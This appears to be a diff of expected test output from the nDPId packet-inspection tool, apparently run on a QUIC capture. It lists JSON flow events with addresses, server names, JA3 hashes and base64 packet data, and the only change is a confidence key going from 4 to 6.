-00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-vh5ouxa-hjud.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-vh5ouxa-hjud.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02318{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1621432876694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432876694,"pkt":"AAAAAAAAAAcAraZQCABFAAViGmJAAEARTcLAqP4L++wSxuaoAbsFTqV5w\/8AAB0IbOm6o+b7s18AAEU0LLQC1yXAWiYnG0IzhK2VYtXys8mZ62JD8wkhsWvqnkzFbhvt3QJvfuPuR1sirwI+KShnUrbM1afN6aEucT9hrS0klXGQkP\/sjbWxbRSVpPd+f9X5MHJS9Hz6kemhKetvXTyJqGbN1G75GC+zwvky4Qoa+1\/EIdMd\/MIuXCU84yBXwj+twRLahCznv3yroalrF474u7NubFW0jMWcRH5J+A15Xme108pRGv37O29qvyKdzOm1\/NNznL9yP2RLUgbmtwygArdZz610E2wne9tt8WxltfSjaavCs3J3wGNB7kwvqcFpV4kuTtBj8cRhDJ8UsAFET3J5wrdiOHvAkcai8b4dgSQNPHDp3xVf8Xxr5a3lZo4oeM2pSFKI4zOy\/gL3IOWrKEH5BRE0tivVe3HggMJPpzZub39IlYLUFGhw1FqGAvGU\/L7xouN\/GGzHYbjg9KBXpegMLxXi3ppGr4R3ZbEegXJV66wPYugPfdTLxj3R2ZAxcu5MSpStr5MG9ltk8lzwLtmx5YcbJbKyEMRaCF1iW\/dcIpEdw9mhALjKcmSqJOsabUpsYKoKUTDLiRb0OEMir5UbZUiQVy4\/7Sfjg8ICBXUxYfj0TnKlaJ+wlyizyGCVB0WjDtYmQo50PxvLRALC1oTClrCfpu+K5RTPrOVf3+YHiGNjoiEYVT3Ysn6ef85QtfRP8nysquU2HQ88cdBu1x51\/5RyV\/+DRSGX7VUOAssxQ1MRma0bjRn3Dmy0rmBgLMBljm\/VFeCUpmDEQk1q52vMrgRR1lJE4AiR7egIJ\/6ghIxt2OWtcRN3jJsaTUSy\/zR3IMutW13i9Gw+AVIamx3Vj3f2LmCwuEcU4XeICojezZ7vi0NbDJmYGkjSwtTh7b4ESpxisA62XYIfsFsU6JrkPXTQT01HZP1jD5W\/7lmQ0Uzgb\/2mciiqV+PLt4y8IbSi9MMFIn7Fr1j3biSlXPu\/RKPCVeZazwP4GHO\/RBVQpMem9Q8N3P8d2DHSrWjG21BATI\/t4zX6uTupPdTce\/pRl3wh6arawXv4rYaa734DQGVOXKuJAL3VUiEX4k2WKQ6rMy\/2mgtg8f52j\/tm9h2LXlahvO4wQoJ2w0aBRN8mS\/cj\/Ra3JQN+4\/oZNfyurOlap8hdr9uhFzS6jiSKCSEudsefNrvctv9D2s60pV3\/7RkKVVy2YmGu\/fMPAer+QSxevYYR\/AKkpcNjdJbkDD7YmHSguK9rnJzqbP\/etQrDxN0GrlpCWIXAdhL7Wfi2tYHcbnj8KVMmATRN+0400Z6WxauakXJuNv0JQTaVaubj\/PKuuq5K2vb0tCYbHDPd+MadAPo+JJ8pU1ZDa4KyOjlkd5AJbK5Q0frPvukJDpBDNImKfhDpKSebp8mS0bQbYQY0FjVILDcWSeoYGnRDjH4XJcz4fxZCkv0YvY6T1xDnsZGbGC4zJU59YxE5WYODQH3mhJYDZb\/R1Z23tx++rEKCl2Q7KLWqJ5ApuDmaONgp5W6ybOYwz0urwNxYZ8lWWON9dZHSxM5jOoeTSovDCyex8ryrdpEr1yHyEEgBjx97a\/VbuMDI9wE+07AAsKn1v0pSUT2Y4vUwGIFdflJgbjasGl8KWyMuibJCGP7tF5SXVICBAc\/QHntpbpYtsuJHF0\/RWuZ5yeLaxKHv5t92AvGJsO1Kn9KikspdEaOGD07Y\/IrmImcu4IELab4LYJw6sE0eqBRwufR9cgXtZLQQbDqd2TajaJSlfs8qSumGCJZU9e7j4K131s1OqQIPtVUm"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1621432905483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432905483,"pkt":"AAAAAAAAAAUAtOBOCABFAAViNntAAEARSxrAqP4LXWSX3ZW7AbsFTtZExP8AAB0IShhVJvVFj04AAEU0bXBdseJ245uG4fwHC8m+6tqS\/v6gWT6TRuENAP9tPhydGDsgF7KG9PiuBNd6U4OZoDZDYxdNvgEXRnGpqok1G3cCYyBnmB+42zbaUcW6U0WH8uxsOi5\/mEnkpv0Euyn4vltnRK3e5h6tt2GHGaZNsy6oaivFwmgBfGYXqlFzvmiPzvJp0LRexpgDjU1i\/7Vx3NLfmf7PCWakVkQTn3Mv0hIdyp8NbWby75nFm5vd9qbf7rSRebZCqrG\/gNT3SMKZ9PYXe6zl6Or9B3VtV0CUQVHLUT2ZljaOp+wo2wp+zymYt6qEwhJmfIj1MPdkgXuV3gJi0KHCUAcVSQRFxSkySlYbKd6ChL8GI5FOjZ8QvdYKnwQM7\/z8AgfduUObnEfl6hZZ2npNR6FcP0WFzqQBRqRGO9wwKzFt\/XTgmkAPd3\/wF\/a5iP3PPQDPTiggyH1xpv0ciMP9WN7wbydFhtrLUcfgELiYllzto5jkyT0K6\/M5XWw3Kv1G4BMmIruFxnBZKQUoqA9d1oSjSc9wdZfqCt34KDErlg5RxTvxzlCxbSR1YL1ln0Lc5ooN49Vt0Q6U67rR+tWR3ESuIWUzLCixA\/08yk6CIflG592BY6gPW8Cbm\/dEQnktmUnnaHerrmQJ+oSjAV3xiVvlBT9XkcfS4WGAQSxeXxfXway\/cpuKTExCubwigm9g36DqjHLDwHWdQ6CDBwzPwE7JMioE0h5qzz7kgFtRTn3Dx0fN21mdCirtg9qB4hRCIkLgp9PkotTkEDbsPz4aPrVoVedFUeJh0cg3JwF0sNVAEJ\/svLXWTrK8yCxq3qPCAIv+qhZfntTMCSTOlv+m4\/SG6pP4\/xXexllpq4vN11z\/230fqh41BREXT6ToSYKiLPgIta9MKijhMUrhqLp\/H+6H5q5lyTMHqWsEsQNb9gmgb5bTrnpRQ66GI3I\/Eu6QRe6JQXxj0tdcpH1LILG1JY5awETdC9Gy\/ssWffqANToHPZNHsKgLSZ1Nr4vYsqiHrBBykgGu6do9vSxz86\/Q7Nfe09TEYnNYd\/kOxWDgAjPgINa9ldEyBy\/c1LwwfuQYBqjVd6qzuIvK08UzshDfAry1FSjTNf4Xhzv+C+kRHXoa7jBGnB6icP7W4jD\/KUJLbHASUFpcjtDotzShDZHUYL2umLhCdB5TlPKE75C7x9wNG7TVI9tJsWFBgyfIZUHuK2V6Iv1Xy+i0DPqZ33eKf2\/0cktp3L9oQQztf0yom9iQlAFOrjb0BYxuxSQsDAuCBTfuHuiEnBMg+uie7JClpFd8oxRzgLF2UmGs+bcAjRKlbO8KUqBVWyus6KeC+GY7NYnQOkEB79W\/LSs6F\/y3yumt9XaOjhKZsA1BY2GPva6DJ9bGm5lZVeWW5MqGFMwmbmEdGj7B2lfP6DGaxySHgfivVSWM5AP9dRouhItZWUMTYuA42yBFxC7yYUU5K2dZxoCQBpBD8hiq\/kMUMEM3CXwPlOYnLiDJ4+OLlI1CXf6o16idWwlO57uhDJqlkgqP5iNglZKDiDaLUKSczncTiHuKNaqGxKe+jsT2MHO9nT+g41OMRLOnPZdlHoF\/GerD0RU3bVnuaPA\/7hWpOovJjEYu0nZDxzelWy4hmTrQXIfWloeao6NvLIo0\/Yq0zpGecbJvwB4o4kud6kzKSyDmvDz4lmDhp7J+b+a+a4OXVg9LI3gcKi3B+a6ggFfUWsH3jytuH49v9jql4XnS3YfR4DGtKs1U+A54fAEg+9sHrLj7+fD3uJet9knr5KO1"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DataSaver","breed":"Fun","category":"Web"},"quic": {"client_requested_server_name":"litepages.googlezip.net","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DataSaver","breed":"Fun","category":"Web"},"quic": {"client_requested_server_name":"litepages.googlezip.net","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1621432905490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432905490,"pkt":"AAAAAAAAAAUAlUIhCABFAAViNn5AAEAROxbAqP4LqsRafrJUAbsFTm9IwP8AAB0IsTWhMbhJUaMAAEU0Gz3E4x\/7PJCbI+CzxViIeUiiyxN5gIybKCWDCC8MybuqrNIvL9Pc+KUdkIcv1Parf76zB\/TXo6yFx03Ggg9vnqr6bkGGsAil7g9byvv9gAZjNQMGSu2b\/WIj+O2UGwYR9Ze56oGlPtQ3fK8ScJ+YBFKT+cpojJQmaymD6Gl7O0M2IsyhuN\/z5MNvVeoQtlTGtwJwJF4t3CB3+LaplqunC8tjUfp86B9GZjRjxLI+vZiWX5JnbOLJMNt1qMf64QnBwt3u85Pa9y3sMgX4lS49\/gtIXTs4bG2nNuP5iZc9DQwpayCdOqbJxVUpt1Fl9lqfqkGDabD\/h21kbArS1JNUPCYt82JW2kdPr89gKelvwKxs4MSTRQcLucGHeSqa+vxitAXlW11buSsT2YEY4TaaN7WLCC6Y5OgIewLiKrBgAIDD1JgOLmJe0jh8CtrwC4u83uCHm2ZVbMl2zcjPFlgSm1Ay5QghKEobHUp9BoKLbGW0OMfnx\/vMYa29tA+ukDFJJVEkBFUnmO5PVGVBLdD\/qq5Vm3qeCHn7bH0JKdEAvXgh7drH4CTmvjpTCgzXInM88QbOwK\/8hBF9B0y\/tT2huASOzdsreHMYES8k0ynoTtTU\/Go7e+As+IjpMhtw+r\/xyPdBQWw34uc2UrITsPWB94yJD0ktCz9KUH5fj5j\/MTcB3+EW1+ja2Sj2nYyRiHaQ+PsYbGaz6wXCZf\/tEQta61UXPhInHqIOpnQp\/diA\/YXmtWKl13Ka\/nxH0\/283amVXk8g\/p5xQZLdYYbM1SRNChx+BZ5020iyk2PcohpEjNvyiSDmDjrsIgS+Zr+qK1KW+WNd8m7ZfukNh06oyt6uTkWtGfWfvcwkR3CbVTV9K1zZ3JVpadtBKHoVfeSxzUNB8QO3HY1xoBwUiGOqQMyedNultJ9KH4IhP5o5Kj0DYGUHyTaflltEhcSWiITyfwyOZfUVxdCe3WBfMRyjKG3hw9Ag1m0IdO+3+4Sai4t9HAV2dkZrH0YBb8TzQtijMzuOc\/UkBsPoIHkBGzeAvR\/LY9Vvx0FYUh5X9ZD3MIwp92rfZV5hsqNc3rsZmWPZbpmeAfYzTL3829e2Wo5suo7aDIt+YYCq602XYEuGWM+tC+iqjQVOxADDkiMVvc8A2HYsO3wOW+49aVFLGStxeuhQV5lyMKSoVc3s2H3N+yL2RhtSvdV+b0mpGnnhW\/vc7mC9x1sZNQDq1FvyWi6OgOdM6ikZBFhVxT+99VaccO1YRMkituNtiRsVhm75XQZqQj3SqqL7zi4YYwKWE27YtUcI5DX96iUTbNaIXKbJoRkVWEHi7xVpW0qoKbMqyaTsMaxe9oY9tVhw325iZUqJTscJGuYlireqNEe49UiKHrFD3pBUHCyEpSwijnx0RbAj6rwweNbjXSMbaikwVIiNvMIL5VCmZOW\/ZtxLPMa2yys2nECf\/Vuy3Ou\/9DnpSXaPhTvBFgWf28msqEADWXnHOxczzQxoYSRHSEzLrR2jTHxifPCTR9hSWy+JWnFXHJLcH7QJbBCrIdXrcgRQBgdnrkM4BVlslDUk6ZPisArQe+Rj5RV5jX3HYw7JzZSegmwQhkALBsMs6Mymiz0gK4lwsh2Az\/uP7GO8UcOQkp9ZEs6GaH9yS+2hlRtG0Haykp8Fzi0\/SkuRseswdA0H14gPSc\/5WFCyoI7Y18l0y18eYy1sFdl5G9h5zsIxr1Gxqhupt8DBAd46yPzEuBUgOukFiKNOskklsdcO5v54a8qPY1mJBX8XQWL5"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1621432907578,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432907578,"pkt":"AAAAAAAAAAUAUmvlCABFAAViOItAAEARD\/\/AqP4LYvvLUamjAbsFTviww\/8AAB0IdEz2yPqFNEUAAEU01lkubHvVAeXsQ5sXGwZERrAsLetkvRSa9r94YrnlT\/RFyWgWZjc\/+m3X4BabWgtMfG2MrRlDeu83ayw7f1Rv29gQ1Fwf3qL9\/y5QL3cILj9wzX79jhfIBW7rk2S021YCCn4cPYvBdSyZo8hiLdDRqY342daZqWhur\/YwUIhfZdJAQA0xgKFAGLgZkHQQNo8iY7pDwNfTWCrPxPcVH\/XyhdL7AM63JNrgEEzMf\/9jsRjfxGAePPUm1\/8wwIq77\/+PVwZ2j3YBRiYZ0seAv7CvRMkkYVrxpAOSkaAOCWqoN0s5yzHmFyDcbv+feS4uFL5UXCfavdd82ZgTmlsjFiR+hG9t7chDZL56DXhZ5TLxZf3UYmIHnX6JZkUrLIVJZ6\/OVCfo3DHRQ4PJOh\/CzeVr8LoegDT5B8ULST3gZnAqDfI276pUF8whh8aVckRyaBeY2ZCBjMcnwLeLg7OKLQvK5wC5BJkNIi5J8oyjbOTedU60kHu3fE+53ZlWBZRS7HAIJQGXa4GEDkaQ5k4XnO\/xxxjpThDLvE8dUHcTQ9ovWlb8\/JSF0up6I6NgBtYGIn5XhNqx0EdEUtgLAzzPtcFSMuYYjicAs9S+W8GgyoFH7nZiOgJcvL3AdZ\/GXk38PSB357IxdJooYxNvjvQ+gKfGJQ5jvUMuu0oyiEO2+gYr9SeGcmLMhDdauhnvk0udsh4awocJv+zrEMXX8l2xSzHndbPtEGFu0slTz0a9mozr6y79gh8In5Bn2s23hBM4ZGcGhqvwp1y4\/CIp1v8EZ3CF\/c\/nf\/AnBeGNBGm\/vfaxi2\/dM2Rilztfd9EUjx6Uz0Q4WrIB5aEwh0AOzRhbK3NHQKo0V2nfc5lpb0UDc9+BrNHOqAdA4BUxqc32WdBMwB8nu8So3Ug4rrM\/JVLFz6\/kRNXUJZ